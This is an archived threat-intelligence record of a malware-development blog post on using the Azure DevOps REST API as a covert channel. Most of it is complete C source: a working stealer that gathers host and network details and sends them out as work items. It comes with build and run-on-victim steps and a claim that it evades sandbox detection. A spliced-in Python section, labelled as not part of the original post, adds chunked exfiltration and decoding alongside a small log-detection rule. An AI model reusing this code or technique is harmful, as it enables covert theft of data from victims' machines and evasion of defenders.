{
	"id": "1ebd9043-b3f7-4c8b-88a7-6a008ef4e2f1",
	"created_at": "2026-04-06T00:14:03.427892Z",
	"updated_at": "2026-04-10T03:36:22.044582Z",
	"deleted_at": null,
	"sha1_hash": "1156234dad87e29276371637d96c15a8c3d1b961",
	"title": "Malware development trick 49: abusing Azure DevOps REST API for covert data channels. Simple C examples.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2909740,
	"plain_text": "Malware development trick 49: abusing Azure DevOps REST API\r\nfor covert data channels. Simple C examples.\r\nBy cocomelonc\r\nPublished: 2025-08-11 · Archived: 2026-04-05 22:25:23 UTC\r\n7 minute read\r\n﷽\r\nHello, cybersecurity enthusiasts and white-hat hackers!\r\nIn this post, I want to show how the Azure DevOps REST API - a totally legitimate Microsoft service - can be used by an attacker to communicate with their infrastructure in unexpected ways. This is not an Azure DevOps bug, but an abuse of functionality.\r\nThink of it as using a perfectly fine hammer… to crack a safe.\r\nWe will explore three minimal proof-of-concepts:\r\nsending a simple GET request to list Azure DevOps projects.\r\ncreating a work item (Task) with a title.\r\ncreating a work item with a title and a description containing arbitrary text - a “safe” stand-in for sensitive data in a stealer scenario.\r\nhttps://cocomelonc.github.io/malware/2025/08/11/malware-tricks-49.html\r\nPage 1 of 22\r\nazure services\r\nIf, like me, you are not familiar with Azure DevOps Services, let me show the few steps needed to create a minimal environment for our hacking scenario. We just need the smallest possible environment so our PoC has somewhere to talk to.\r\nGo to https://dev.azure.com/ and sign in with a Microsoft account. If prompted, create a new organization - name it anything (in my case, cocomelonkz ):\r\nThen, create a project. In your new organization, click “New Project”. 
Give it a short name, e.g., hack or cat . Visibility can be private (this is fine for our test).\r\nFinally, generate a Personal Access Token (PAT). In my case the token has full access, but read and write permissions are enough for our scenario.\r\nTo check that everything is correct, test the API via curl :\r\ncurl -u \":your token here something like 9O1QFlG1YxLe88F65PfHutr...........CAAAAAAAAAAAAASAZDOOcAA\" -X GET \"htt\r\nYou should see JSON with your project list. If you get that, your Azure DevOps “C2 server” is ready for abuse.\r\npractical example 1\r\nThe simplest way to talk to the Azure DevOps REST API is to hit an endpoint, for example:\r\n/cocomelonkz/_apis/projects?api-version=7.1\r\nThe full source code looks like this ( hack.c ):\r\n/*\r\n * hack.c\r\n * minimal simple GET request to\r\n * Azure DevOps REST API:\r\n * list of projects\r\n * helper function for stealer\r\n * author @cocomelonc\r\n */\r\n#include \u003cstdio.h\u003e\r\n#include \u003cwindows.h\u003e\r\n#include \u003cwinhttp.h\u003e\r\n\r\nint main() {\r\n  HINTERNET hSession, hConnect, hRequest;\r\n  DWORD bytesRead;\r\n  char buffer[4096];\r\n\r\n  // init a WinHTTP session (the user agent string is sent with every request)\r\n  hSession = WinHttpOpen(L\"UserAgent\", WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,\r\n                         WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0);\r\n  if (!hSession) {\r\n    printf(\"WinHttpOpen failed: %lu\\n\", GetLastError());\r\n    return 1;\r\n  }\r\n\r\n  // connect to dev.azure.com (HTTPS)\r\n  hConnect = WinHttpConnect(hSession, L\"dev.azure.com\", INTERNET_DEFAULT_HTTPS_PORT, 0);\r\n  if (!hConnect) {\r\n    printf(\"WinHttpConnect failed: %lu\\n\", GetLastError());\r\n    
WinHttpCloseHandle(hSession);\r\n    return 1;\r\n  }\r\n\r\n  // GET request\r\n  hRequest = WinHttpOpenRequest(\r\n    hConnect,\r\n    L\"GET\",\r\n    L\"/cocomelonkz/_apis/projects?api-version=7.1\",\r\n    NULL, WINHTTP_NO_REFERER,\r\n    WINHTTP_DEFAULT_ACCEPT_TYPES,\r\n    WINHTTP_FLAG_SECURE\r\n  );\r\n  if (!hRequest) {\r\n    printf(\"WinHttpOpenRequest failed: %lu\\n\", GetLastError());\r\n    WinHttpCloseHandle(hConnect);\r\n    WinHttpCloseHandle(hSession);\r\n    return 1;\r\n  }\r\n\r\n  // headers: Azure DevOps PATs are sent as HTTP Basic auth with an empty\r\n  // user name, i.e. base64(\":PAT\")\r\n  const wchar_t *headers =\r\n    L\"Accept: application/json\\r\\n\"\r\n    L\"Authorization: Basic \u003cmy base64 encoded token here\u003e\"\r\n    L\"\\r\\n\";\r\n\r\n  WinHttpAddRequestHeaders(hRequest, headers, (ULONG)-1, WINHTTP_ADDREQ_FLAG_ADD);\r\n\r\n  // send request\r\n  if (!WinHttpSendRequest(hRequest, WINHTTP_NO_ADDITIONAL_HEADERS, 0,\r\n                          WINHTTP_NO_REQUEST_DATA, 0, 0, 0)) {\r\n    printf(\"WinHttpSendRequest failed: %lu\\n\", GetLastError());\r\n    return 1;\r\n  }\r\n\r\n  if (!WinHttpReceiveResponse(hRequest, NULL)) {\r\n    printf(\"WinHttpReceiveResponse failed: %lu\\n\", GetLastError());\r\n    return 1;\r\n  }\r\n\r\n  // read the response body (JSON list of projects)\r\n  while (WinHttpReadData(hRequest, buffer, sizeof(buffer) - 1, \u0026bytesRead) \u0026\u0026 bytesRead \u003e 0) {\r\n    buffer[bytesRead] = '\\0';\r\n    printf(\"%s\", buffer);\r\n  }\r\n\r\n  WinHttpCloseHandle(hRequest);\r\n  WinHttpCloseHandle(hConnect);\r\n  WinHttpCloseHandle(hSession);\r\n  return 0;\r\n}\r\nAs you can see, this is a program with minimal helper logic, and it is enough to pull metadata from Azure DevOps without triggering anything suspicious in most network setups: the only thing on the wire is an HTTPS request to dev.azure.com.\r\nJust replace the placeholder with your own token, base64-encoded together with the leading colon:\r\necho -n \":9O1QFlG1...QQJ99BHACAAAAAAAAAAAAASAZDOOcAA\" | base64\r\ndemo 1\r\nLet’s see the first example in action. 
Compile it:\r\nx86_64-w64-mingw32-g++ hack.c -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-section\r\nThen, run it on the victim’s machine (in my case a Windows 10/11 VM):\r\n.\\hack.exe\r\nAs you can see, everything works as expected!\r\npractical example 2\r\nLet’s update our logic: creating a work item with a title. An attacker wants to push data from the victim’s host, not only pull it, and Azure DevOps supports creating work items via the REST API.\r\nWe send a JSON Patch document to:\r\nPOST /ORG/PROJECT/_apis/wit/workitems/$Task?api-version=7.1\r\nContent-Type: application/json-patch+json\r\nHere’s a minimal PoC that sets only System.Title , based on the Microsoft documentation ( hack2.c ):\r\n/*\r\n * hack2.c\r\n * Azure DevOps REST API\r\n * create work item\r\n * helper function for stealer\r\n * author @cocomelonc\r\n */\r\n#include \u003cstdio.h\u003e\r\n#include \u003cstring.h\u003e\r\n#include \u003cwindows.h\u003e\r\n#include \u003cwinhttp.h\u003e\r\n\r\nint main() {\r\n  HINTERNET hSession, hConnect, hRequest;\r\n  DWORD bytesRead;\r\n  char buffer[8192];\r\n\r\n  // headers: replace the token with your own base64(\":PAT\")\r\n  const wchar_t *authHeader = L\"Authorization: Basic Ojl...FBQUFBQVNBWkRPT2NBQQ==\\r\\n\";\r\n  const wchar_t *contentHeader = L\"Content-Type: application/json-patch+json\\r\\n\";\r\n  const wchar_t *acceptHeader = L\"Accept: application/json\\r\\n\";\r\n\r\n  // JSON Patch document: a single add operation for the title field\r\n  const char *postData = \"[{\\\"op\\\":\\\"add\\\",\\\"path\\\":\\\"/fields/System.Title\\\",\\\"from\\\":null,\\\"value\\\":\\\"meow\\\"}]\";\r\n\r\n  hSession = WinHttpOpen(L\"UserAgent\", WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,\r\n                         WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0);\r\n  hConnect = WinHttpConnect(hSession, L\"dev.azure.com\", INTERNET_DEFAULT_HTTPS_PORT, 0);\r\n  hRequest = WinHttpOpenRequest(\r\n    
hConnect,\r\n    L\"POST\",\r\n    L\"/cocomelonkz/hack1/_apis/wit/workitems/$Task?api-version=7.1\",\r\n    NULL, WINHTTP_NO_REFERER,\r\n    WINHTTP_DEFAULT_ACCEPT_TYPES,\r\n    WINHTTP_FLAG_SECURE\r\n  );\r\n  if (!hSession || !hConnect || !hRequest) {\r\n    printf(\"WinHTTP setup failed: %lu\\n\", GetLastError());\r\n    return 1;\r\n  }\r\n\r\n  WinHttpAddRequestHeaders(hRequest, authHeader, -1L, WINHTTP_ADDREQ_FLAG_ADD);\r\n  WinHttpAddRequestHeaders(hRequest, contentHeader, -1L, WINHTTP_ADDREQ_FLAG_ADD);\r\n  WinHttpAddRequestHeaders(hRequest, acceptHeader, -1L, WINHTTP_ADDREQ_FLAG_ADD);\r\n\r\n  // the body is the JSON Patch document; Azure DevOps answers with the created work item as JSON\r\n  WinHttpSendRequest(hRequest,\r\n                     WINHTTP_NO_ADDITIONAL_HEADERS, 0,\r\n                     (LPVOID)postData, strlen(postData),\r\n                     strlen(postData), 0);\r\n  WinHttpReceiveResponse(hRequest, NULL);\r\n  while (WinHttpReadData(hRequest, buffer, sizeof(buffer) - 1, \u0026bytesRead) \u0026\u0026 bytesRead \u003e 0) {\r\n    buffer[bytesRead] = '\\0';\r\n    printf(\"%s\", buffer);\r\n  }\r\n\r\n  WinHttpCloseHandle(hRequest);\r\n  WinHttpCloseHandle(hConnect);\r\n  WinHttpCloseHandle(hSession);\r\n  return 0;\r\n}\r\nDon’t forget to replace the token with your own base64 -encoded one.\r\ndemo 2\r\nCompile the second example:\r\nx86_64-w64-mingw32-g++ hack2.c -o hack2.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-secti\r\nThen, run it on the victim’s host:\r\n.\\hack2.exe\r\nNow our PoC creates an artifact in the cloud: a new Task work item titled meow in the hack1 project.\r\npractical example 3: stealer\r\nHere we’ll simulate a scenario where system information is sent to Azure DevOps, just as in my earlier GitHub API, VirusTotal and Telegram examples.\r\nThe full source code looks like this ( hack3.c ):\r\n/*\r\n * hack3.c\r\n * Azure DevOps REST API stealer\r\n * author @cocomelonc\r\n */\r\n#include \u003cwindows.h\u003e\r\n#include 
\u003cwinhttp.h\u003e\r\n#include \u003cwincrypt.h\u003e\r\n#include \u003ciphlpapi.h\u003e\r\n#include \u003cstdio.h\u003e\r\n#include \u003cstring.h\u003e\r\n// the pragmas below are honoured by MSVC only; MinGW ignores them, so there\r\n// the libraries go on the command line: -lwinhttp -liphlpapi -lcrypt32\r\n#pragma comment(lib, \"winhttp.lib\")\r\n#pragma comment(lib, \"iphlpapi.lib\")\r\n#pragma comment(lib, \"crypt32.lib\")\r\n\r\n// escape a C string for use inside a JSON string literal. The collected\r\n// system info contains newlines; pasted raw into the body they are not\r\n// valid JSON, and only lenient parsers accept that\r\nstatic void json_escape(const char* in, char* out, size_t outSize) {\r\n  size_t j = 0;\r\n  for (; *in \u0026\u0026 j + 2 \u003c outSize; in++) {\r\n    switch (*in) {\r\n      case '\"':  out[j++] = '\\\\'; out[j++] = '\"'; break;\r\n      case '\\\\': out[j++] = '\\\\'; out[j++] = '\\\\'; break;\r\n      case '\\n': out[j++] = '\\\\'; out[j++] = 'n'; break;\r\n      case '\\r': out[j++] = '\\\\'; out[j++] = 'r'; break;\r\n      case '\\t': out[j++] = '\\\\'; out[j++] = 't'; break;\r\n      default:\r\n        // drop any other control character, keep everything else as is\r\n        if ((unsigned char)*in \u003e= 0x20) out[j++] = *in;\r\n    }\r\n  }\r\n  out[j] = '\\0';\r\n}\r\n\r\nint sendToAzure(const char* project, const char* pat, const char* title, const char* description) {\r\n  HINTERNET hSession, hConnect, hRequest;\r\n  char authHeader[512];\r\n  char escTitle[512];\r\n  char escDesc[8192];\r\n  char jsonBody[10000];\r\n  DWORD bytesRead;\r\n  char buffer[8192];\r\n\r\n  // construct the JSON Patch body (title + description), escaping both values\r\n  json_escape(title, escTitle, sizeof(escTitle));\r\n  json_escape(description, escDesc, sizeof(escDesc));\r\n  snprintf(jsonBody, sizeof(jsonBody),\r\n    \"[{\\\"op\\\":\\\"add\\\",\\\"path\\\":\\\"/fields/System.Title\\\",\\\"value\\\":\\\"%s\\\"},\"\r\n    \"{\\\"op\\\":\\\"add\\\",\\\"path\\\":\\\"/fields/System.Description\\\",\\\"value\\\":\\\"%s\\\"}]\",\r\n    escTitle, escDesc);\r\n\r\n  // encode the PAT to base64; Azure DevOps expects Basic auth with an\r\n  // empty user name, i.e. base64(\":PAT\")\r\n  char patAuth[256];\r\n  snprintf(patAuth, sizeof(patAuth), \":%s\", pat);\r\n  DWORD patLen = lstrlenA(patAuth);\r\n  DWORD base64Len = 0;\r\n  if (!CryptBinaryToStringA((BYTE*)patAuth, patLen, CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, NULL, \u0026base64Len)) {\r\n    fprintf(stderr, \"Base64 length error\\n\");\r\n    return 1;\r\n  }\r\n  char patBase64[256];\r\n  if (base64Len \u003e sizeof(patBase64) ||\r\n      !CryptBinaryToStringA((BYTE*)patAuth, patLen, CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, patBase64, \u0026base64Len)) {\r\n    fprintf(stderr, \"Base64 encode error\\n\");\r\n    return 1;\r\n  }\r\n  snprintf(authHeader, sizeof(authHeader), \"Authorization: Basic %s\", patBase64);\r\n  // printf(\"%s\\n\", authHeader);\r\n\r\n  hSession = WinHttpOpen(L\"Agent\", WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0);\r\n  hConnect = WinHttpConnect(hSession, L\"dev.azure.com\", INTERNET_DEFAULT_HTTPS_PORT, 0);\r\n  char path[512];\r\n  snprintf(path, sizeof(path), \"/cocomelonkz/%s/_apis/wit/workitems/$Task?api-version=7.1\", project);\r\n  wchar_t wpath[512];\r\n  
MultiByteToWideChar(CP_ACP, 0, path, -1, wpath, 512);\r\n  hRequest = WinHttpOpenRequest(hConnect, L\"POST\", wpath, NULL, WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES, WINHTTP_FLAG_SECURE);\r\n  if (!hSession || !hConnect || !hRequest) {\r\n    fprintf(stderr, \"WinHTTP setup failed: %lu\\n\", GetLastError());\r\n    return 1;\r\n  }\r\n  wchar_t wauthHeader[512];\r\n  wchar_t wctypeHeader[] = L\"Content-Type: application/json-patch+json\";\r\n  MultiByteToWideChar(CP_ACP, 0, authHeader, -1, wauthHeader, 512);\r\n  WinHttpAddRequestHeaders(hRequest, wauthHeader, -1, WINHTTP_ADDREQ_FLAG_ADD);\r\n  WinHttpAddRequestHeaders(hRequest, wctypeHeader, -1, WINHTTP_ADDREQ_FLAG_ADD);\r\n  WinHttpSendRequest(hRequest, WINHTTP_NO_ADDITIONAL_HEADERS, 0, (LPVOID)jsonBody, strlen(jsonBody), strlen(jsonBody), 0);\r\n  // wait for the response and print it (checking)\r\n  WinHttpReceiveResponse(hRequest, NULL);\r\n  while (WinHttpReadData(hRequest, buffer, sizeof(buffer) - 1, \u0026bytesRead) \u0026\u0026 bytesRead \u003e 0) {\r\n    buffer[bytesRead] = '\\0';\r\n    printf(\"%s\", buffer);\r\n  }\r\n  WinHttpCloseHandle(hRequest);\r\n  WinHttpCloseHandle(hConnect);\r\n  WinHttpCloseHandle(hSession);\r\n  return 0;\r\n}\r\n\r\nint main() {\r\n  char systemInfo[4096];\r\n  CHAR hostName[MAX_COMPUTERNAME_LENGTH + 1];\r\n  DWORD size = sizeof(hostName) / sizeof(hostName[0]);\r\n  GetComputerNameA(hostName, \u0026size);\r\n  // GetVersionEx is deprecated: without a compatibility manifest it reports\r\n  // 6.2 on Windows 8.1 and later; good enough for a PoC\r\n  OSVERSIONINFO osVersion;\r\n  osVersion.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);\r\n  GetVersionEx(\u0026osVersion);\r\n  SYSTEM_INFO sysInfo;\r\n  GetSystemInfo(\u0026sysInfo);\r\n  DWORD drives = GetLogicalDrives();\r\n  // zero the adapter buffer so the walk below ends cleanly if GetAdaptersInfo\r\n  // fails (e.g. more than 16 adapters) instead of following garbage pointers\r\n  IP_ADAPTER_INFO adapterInfo[16] = {0};\r\n  DWORD adapterInfoSize = sizeof(adapterInfo);\r\n  GetAdaptersInfo(adapterInfo, \u0026adapterInfoSize);\r\n  snprintf(systemInfo, sizeof(systemInfo),\r\n    \"Host Name: %s\\n\"\r\n    \"OS Version: %lu.%lu.%lu\\n\"\r\n    \"Processor Architecture: %u\\n\"\r\n    \"Number of Processors: %lu\\n\"\r\n    \"Logical Drives: %lX\\n\",\r\n    hostName,\r\n    osVersion.dwMajorVersion, osVersion.dwMinorVersion, 
osVersion.dwBuildNumber,\r\n    sysInfo.wProcessorArchitecture,\r\n    sysInfo.dwNumberOfProcessors,\r\n    drives);\r\n  for (PIP_ADAPTER_INFO adapter = adapterInfo; adapter != NULL; adapter = adapter-\u003eNext) {\r\n    snprintf(systemInfo + strlen(systemInfo), sizeof(systemInfo) - strlen(systemInfo),\r\n      \"Adapter Name: %s\\n\"\r\n      \"IP Address: %s\\n\"\r\n      \"Subnet Mask: %s\\n\"\r\n      \"MAC Address: %02X-%02X-%02X-%02X-%02X-%02X\\n\\n\",\r\n      adapter-\u003eAdapterName,\r\n      adapter-\u003eIpAddressList.IpAddress.String,\r\n      adapter-\u003eIpAddressList.IpMask.String,\r\n      adapter-\u003eAddress[0], adapter-\u003eAddress[1], adapter-\u003eAddress[2],\r\n      adapter-\u003eAddress[3], adapter-\u003eAddress[4], adapter-\u003eAddress[5]);\r\n  }\r\n  // project, PAT (truncated here), work item title, description\r\n  sendToAzure(\"hack1\", \"9...CAAAAAAAAAAAAASAZDOOcAA\", \"meow2\", systemInfo);\r\n  return 0;\r\n}\r\nAs you can see, this source code is pretty similar to my GitHub, Telegram and VirusTotal scenarios.\r\ndemo 3\r\nCompile the stealer example:\r\nx86_64-w64-mingw32-g++ hack3.c -o hack3.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-secti\r\nNote that the #pragma comment(lib, ...) lines are honoured only by MSVC; with MinGW the libraries have to be given on the command line (-lwinhttp -liphlpapi -lcrypt32).\r\nThen, run it on the victim’s host:\r\n.\\hack3.exe\r\nAs you can see, everything works as expected!
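Before summing up, here is an added example that is not part of the original post: a Python sketch of both sides of the channel the three C programs build up. The attacker side shows the PAT to Basic-auth encoding from hack.c, the JSON Patch body from hack2.c and hack3.c with proper escaping (hack3.c pastes the collected system info with raw newlines into the body, which only lenient JSON parsers accept), and a chunked base64 encoder/decoder so a blob larger than one description field survives the round trip through work items, which is the two-way use of the API the post mentions. The defender side is a small rule over constructed proxy log lines. The organization and project names come from the post; the title tag, chunk format, log format and user-agent allow-list are assumptions, and nothing here talks to the network.

```python
# Added example, not from the original post. ORG and PROJECT come from the
# post; TAG, the chunk format, SAMPLE_LOG and KNOWN_UA_PREFIXES are assumptions.
import base64
import hashlib
import json

ORG = 'cocomelonkz'
PROJECT = 'hack1'
TAG = 'meow'


def basic_auth_header(pat):
    # Azure DevOps PATs travel as HTTP Basic auth with an empty user name,
    # i.e. base64(':' + PAT), exactly what the echo | base64 step produces
    return 'Basic ' + base64.b64encode((':' + pat).encode()).decode()


def workitem_request(title, description, org=ORG, project=PROJECT):
    # Same endpoint as hack2.c/hack3.c. json.dumps escapes quotes, backslashes
    # and control characters, so arbitrary text is safe to put in the body.
    patch = [
        {'op': 'add', 'path': '/fields/System.Title', 'value': title},
        {'op': 'add', 'path': '/fields/System.Description', 'value': description},
    ]
    return {'method': 'POST',
            'path': '/%s/%s/_apis/wit/workitems/$Task?api-version=7.1' % (org, project),
            'headers': {'Content-Type': 'application/json-patch+json'},
            'patch': patch, 'body': json.dumps(patch)}


def encode_chunks(payload, chunk_size=1024):
    # One work item per chunk. The title carries tag, sequence, total and a
    # short digest so the receiver can order, complete and verify the data.
    # base64 keeps binary and newlines intact (System.Description is an HTML
    # field, so free text may be rewritten by the server).
    digest = hashlib.sha256(payload).hexdigest()[:16]
    chunks = [payload[i:i + chunk_size] for i in range(0, len(payload), chunk_size)]
    return [workitem_request('%s-%d/%d-%s' % (TAG, n + 1, len(chunks), digest),
                             base64.b64encode(c).decode())
            for n, c in enumerate(chunks)]


def decode_chunks(workitems):
    # workitems: the item list a GET on the work items API returns (any order)
    parts = {}
    for wi in workitems:
        fields = wi.get('fields', {})
        title = fields.get('System.Title', '')
        if not title.startswith(TAG + '-'):
            continue
        seq_total, digest = title[len(TAG) + 1:].rsplit('-', 1)
        seq, total = (int(x) for x in seq_total.split('/'))
        parts[seq] = (total, digest, base64.b64decode(fields['System.Description']))
    if not parts:
        return None
    total, digest = parts[min(parts)][:2]
    if sorted(parts) != list(range(1, total + 1)):
        raise ValueError('missing chunks')
    data = b''.join(parts[n][2] for n in range(1, total + 1))
    if hashlib.sha256(data).hexdigest()[:16] != digest:
        raise ValueError('digest mismatch')
    return data


def simulate_response(requests):
    # Constructed stand-in for the GET response: each created item comes back
    # with its fields keyed by reference name (no network in this example)
    return [{'id': n + 1, 'fields': {op['path'][8:]: op['value'] for op in r['patch']}}
            for n, r in enumerate(requests)]


# Constructed proxy log lines: time src_host method dest_host path user_agent
SAMPLE_LOG = '''
10:01:02 dev-laptop-7 GET dev.azure.com /cocomelonkz/_apis/projects?api-version=7.1 Mozilla/5.0
10:01:30 dev-laptop-7 POST dev.azure.com /cocomelonkz/hack1/_apis/wit/workitems/$Task?api-version=7.1 Mozilla/5.0
10:02:11 hr-desktop-3 GET dev.azure.com /cocomelonkz/_apis/projects?api-version=7.1 UserAgent
10:02:12 hr-desktop-3 POST dev.azure.com /cocomelonkz/hack1/_apis/wit/workitems/$Task?api-version=7.1 UserAgent
10:02:13 hr-desktop-3 POST dev.azure.com /cocomelonkz/hack1/_apis/wit/workitems/$Task?api-version=7.1 UserAgent
10:02:14 hr-desktop-3 POST dev.azure.com /cocomelonkz/hack1/_apis/wit/workitems/$Task?api-version=7.1 UserAgent
'''
KNOWN_UA_PREFIXES = ('Mozilla/', 'VSServices/', 'git/')  # assumption: tune per fleet


def flag_suspicious(log_text, burst=3):
    # Work item writes to dev.azure.com from a user agent no sanctioned client
    # uses (the PoCs send 'UserAgent' / 'Agent'), or a burst of writes from one
    # host, are the cheap signals this PoC leaves in proxy logs.
    hits, writes = [], {}
    for line in log_text.strip().splitlines():
        ts, src, method, host, path, ua = line.split(' ', 5)
        if host != 'dev.azure.com' or '/_apis/wit/workitems/' not in path or method != 'POST':
            continue
        writes[src] = writes.get(src, 0) + 1
        if not ua.startswith(KNOWN_UA_PREFIXES):
            hits.append((src, 'work item write with unusual user agent: ' + ua))
        if writes[src] == burst:
            hits.append((src, 'burst of %d work item writes' % burst))
    return hits


if __name__ == '__main__':
    print(basic_auth_header('your-pat-here'))
    reqs = encode_chunks(b'Host Name: DESKTOP-TEST ' * 50, chunk_size=512)
    print(len(reqs), 'work items, first title:', reqs[0]['patch'][0]['value'])
    print(decode_chunks(simulate_response(reqs))[:24])
    for src, why in flag_suspicious(SAMPLE_LOG):
        print(src, why)
```

The decoder consumes the same shape the work items API returns (fields keyed by reference name under fields), so the receiving side only has to GET the items back and feed them in; the digest in the title is what makes a partially deleted or re-ordered batch fail loudly instead of silently producing garbage. On the defensive side the useful signal in this PoC is not the destination but the client: WinHTTP with a hand-written user agent creating work items from a host that never otherwise touches Azure DevOps.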
=^..^=\r\nThis approach has some interesting traits:\r\nblends with legitimate traffic - all calls go to dev.azure.com over HTTPS.\r\nno additional infrastructure needed - the “C2” is a Microsoft service.\r\npersistence and history - once data is in a work item, it stays there until someone deletes it.\r\ntwo-way channel - the same PAT can GET and POST, so data can be exchanged in both directions.\r\nFor blue teams, the lesson is as always: not all “benign” cloud traffic is harmless. Note also that the PAT is hard-coded in the binary; anyone who recovers it from a captured sample gets the same access to the organization as the attacker.\r\nUpload to ANY.RUN:\r\nAs you can see, ANY.RUN says that everything is ok: no threats detected.\r\nSummary: interaction with the Azure cloud is recognized as legitimate behavior and this is the main problem! Pwn! =^..^=\r\nhttps://app.any.run/tasks/5ad3bf05-f2c3-48d0-8552-7a988b536ad8\r\nMalware like AllaKore and APT groups like APT32 (OceanLotus) use Azure for malicious actions in the wild.\r\nI hope this post is useful for malware researchers and C/C++ programmers, spreads awareness of this interesting technique among blue teamers, and adds a weapon to the red teamers’ arsenal.\r\nThanks to ANY.RUN for the API!\r\nANY.RUN\r\nANY.RUN: hack3.exe\r\nMicrosoft: Get started with Azure DevOps REST API\r\nAllaKore\r\nAllaKore variant leverages Azure cloud C2\r\nGithub API stealer\r\nVirusTotal API stealer\r\nTelegram Bot API stealer\r\nsource code in Github\r\nThis is a practical case for educational purposes only.\r\nThanks for your time, happy hacking and good bye!\r\nPS. 
All drawings and screenshots are mine.\r\nSource: https://cocomelonc.github.io/malware/2025/08/11/malware-tricks-49.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://cocomelonc.github.io/malware/2025/08/11/malware-tricks-49.html"
	],
	"report_names": [
		"malware-tricks-49.html"
	],
	"threat_actors": [
		{
			"id": "af509bbb-8d18-4903-a9bd-9e94099c6b30",
			"created_at": "2023-01-06T13:46:38.585525Z",
			"updated_at": "2026-04-10T02:00:03.030833Z",
			"deleted_at": null,
			"main_name": "APT32",
			"aliases": [
				"OceanLotus",
				"ATK17",
				"G0050",
				"APT-C-00",
				"APT-32",
				"Canvas Cyclone",
				"SeaLotus",
				"Ocean Buffalo",
				"OceanLotus Group",
				"Cobalt Kitty",
				"Sea Lotus",
				"APT 32",
				"POND LOACH",
				"TIN WOODLAWN",
				"Ocean Lotus"
			],
			"source_name": "MISPGALAXY:APT32",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d",
			"created_at": "2022-10-25T16:07:24.139848Z",
			"updated_at": "2026-04-10T02:00:04.878798Z",
			"deleted_at": null,
			"main_name": "Safe",
			"aliases": [],
			"source_name": "ETDA:Safe",
			"tools": [
				"DebugView",
				"LZ77",
				"OpenDoc",
				"SafeDisk",
				"TypeConfig",
				"UPXShell",
				"UsbDoc",
				"UsbExe"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "870f6f62-84f5-48ca-a18e-cf2902cd6924",
			"created_at": "2022-10-25T15:50:23.303818Z",
			"updated_at": "2026-04-10T02:00:05.301184Z",
			"deleted_at": null,
			"main_name": "APT32",
			"aliases": [
				"APT32",
				"SeaLotus",
				"OceanLotus",
				"APT-C-00",
				"Canvas Cyclone"
			],
			"source_name": "MITRE:APT32",
			"tools": [
				"Mimikatz",
				"ipconfig",
				"Kerrdown",
				"Cobalt Strike",
				"SOUNDBITE",
				"OSX_OCEANLOTUS.D",
				"KOMPROGO",
				"netsh",
				"RotaJakiro",
				"PHOREAL",
				"Arp",
				"Denis",
				"Goopy"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "5da6b5fd-1955-412a-81aa-069fb50b6e31",
			"created_at": "2025-08-07T02:03:25.116085Z",
			"updated_at": "2026-04-10T02:00:03.668978Z",
			"deleted_at": null,
			"main_name": "TIN WOODLAWN",
			"aliases": [
				"APT32 ",
				"Cobalt Kitty",
				"OceanLotus",
				"WOODLAWN "
			],
			"source_name": "Secureworks:TIN WOODLAWN",
			"tools": [
				"Cobalt Strike",
				"Denis",
				"Goopy",
				"JEShell",
				"KerrDown",
				"Mimikatz",
				"Ratsnif",
				"Remy",
				"Rizzo",
				"RolandRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "2439ad53-39cc-4fff-8fdf-4028d65803c0",
			"created_at": "2022-10-25T16:07:23.353204Z",
			"updated_at": "2026-04-10T02:00:04.55407Z",
			"deleted_at": null,
			"main_name": "APT 32",
			"aliases": [
				"APT 32",
				"APT-C-00",
				"APT-LY-100",
				"ATK 17",
				"G0050",
				"Lotus Bane",
				"Ocean Buffalo",
				"OceanLotus",
				"Operation Cobalt Kitty",
				"Operation PhantomLance",
				"Pond Loach",
				"SeaLotus",
				"SectorF01",
				"Tin Woodlawn"
			],
			"source_name": "ETDA:APT 32",
			"tools": [
				"Agentemis",
				"Android.Backdoor.736.origin",
				"AtNow",
				"Backdoor.MacOS.OCEANLOTUS.F",
				"BadCake",
				"CACTUSTORCH",
				"CamCapture Plugin",
				"CinaRAT",
				"Cobalt Strike",
				"CobaltStrike",
				"Cuegoe",
				"DKMC",
				"Denis",
				"Goopy",
				"HiddenLotus",
				"KOMPROGO",
				"KerrDown",
				"METALJACK",
				"MSFvenom",
				"Mimikatz",
				"Nishang",
				"OSX_OCEANLOTUS.D",
				"OceanLotus",
				"PHOREAL",
				"PWNDROID1",
				"PhantomLance",
				"PowerSploit",
				"Quasar RAT",
				"QuasarRAT",
				"RatSnif",
				"Remy",
				"Remy RAT",
				"Rizzo",
				"Roland",
				"Roland RAT",
				"SOUNDBITE",
				"Salgorea",
				"Splinter RAT",
				"Terracotta VPN",
				"Yggdrasil",
				"cobeacon",
				"denesRAT",
				"fingerprintjs2"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434443,
	"ts_updated_at": 1775792182,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1156234dad87e29276371637d96c15a8c3d1b961.pdf",
		"text": "https://archive.orkl.eu/1156234dad87e29276371637d96c15a8c3d1b961.txt",
		"img": "https://archive.orkl.eu/1156234dad87e29276371637d96c15a8c3d1b961.jpg"
	}
}